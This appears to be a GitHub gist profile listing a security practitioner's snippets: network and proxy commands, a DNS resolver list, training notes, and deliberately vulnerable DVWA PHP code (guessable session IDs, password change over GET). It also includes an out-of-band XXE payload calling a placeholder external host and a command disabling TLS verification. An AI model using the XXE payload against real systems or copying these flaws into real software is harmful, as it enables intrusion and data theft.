Skip to content

Instantly share code, notes, and snippets.

View sapran's full-sized avatar

Vlad Styran sapran

83 followers · 22 following
View GitHub Profile
@sapran
sapran / keybase.md
Created January 24, 2021 10:17

Keybase proof

I hereby claim:

  • I am sapran on github.
  • I am sapran (https://keybase.io/sapran) on keybase.
  • I have a public key ASCg87kjeGdgg5LRWhJaXNpVDoskuE-d1KyB2dmQkfS5EQo

To claim this, I am signing this object:

@sapran
sapran / electron_proxy
Created January 31, 2019 12:28
Run Electron via proxy
NODE_TLS_REJECT_UNAUTHORIZED=0 proxychains4 -f ~/proxychains.conf /Applications/Grammarly.app/Contents/MacOS/Grammarly
@sapran
sapran / iptables_vpn
Created October 29, 2018 15:54
ip rule add from $(ip route get 1 | grep -Po '(?<=src )(\S+)') table 128
ip route add table 128 to $(ip route get 1 | grep -Po '(?<=src )(\S+)')/32 dev $(ip -4 route ls | grep default | grep -Po '(?<=dev )(\S+)')
ip route add table 128 default via $(ip -4 route ls | grep default | grep -Po '(?<=via )(\S+)')
@sapran
sapran / resolvers.txt
Last active October 16, 2018 17:29
1.2.4.8
103.22.248.62
106.186.17.181
109.69.8.34
109.69.8.51
111.223.252.161
114.114.114.114
114.114.114.119
114.114.115.115
114.114.115.119
@sapran
sapran / sample3.php
Last active April 6, 2018 07:35
Code fragment from @ethicalhack3r's DVWA: github.com/ethicalhack3r/DVWA
<?php
$html = "";
if ($_SERVER['REQUEST_METHOD'] == "POST") {
if (!isset ($_SESSION['last_session_id'])) {
$_SESSION['last_session_id'] = 0;
}
$_SESSION['last_session_id']++;
$cookie_value = $_SESSION['last_session_id'];
@sapran
sapran / sample2.php
Last active April 6, 2018 07:35
Code fragment from @ethicalhack3r's DVWA: github.com/ethicalhack3r/DVWA
<?php
if( isset( $_GET[ 'Change' ] ) ) {
// Get input
$pass_new = $_GET[ 'password_new' ];
$pass_conf = $_GET[ 'password_conf' ];
// Do the passwords match?
if( $pass_new == $pass_conf ) {
// They do!
@sapran
sapran / appsec_awareness_training_day3.md
Last active March 29, 2018 06:43
Notes to Application Security awareness training in line with OWASP SAMM initial development team education effort according to Education and Guidance practice.
@sapran
sapran / appsec_awareness_training_day2.md
Last active March 27, 2018 17:43
Notes to Application Security awareness training in line with OWASP SAMM initial development team education effort according to Education and Guidance practice.
@sapran
sapran / vagrant-patch-for-virtualbox-5.2
Created March 25, 2018 19:39 — forked from roktas/vagrant-patch-for-virtualbox-5.2
Patch to make vagrant work with VBox 5.2
#!/bin/bash
set -eo pipefail
TARGETFMT='/opt/vagrant/embedded/gems/gems/vagrant-%s/plugins/providers/virtualbox/driver/meta.rb'
die() { echo >&2 "$@"; exit 1; }
[[ $EUID -eq 0 ]] || die "sudo required"
@sapran
sapran / oob_xxe
Created March 25, 2018 09:45
Taken from this article: https://hawkinsecurity.com/2018/03/24/gaining-filesystem-access-via-blind-oob-xxe/
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>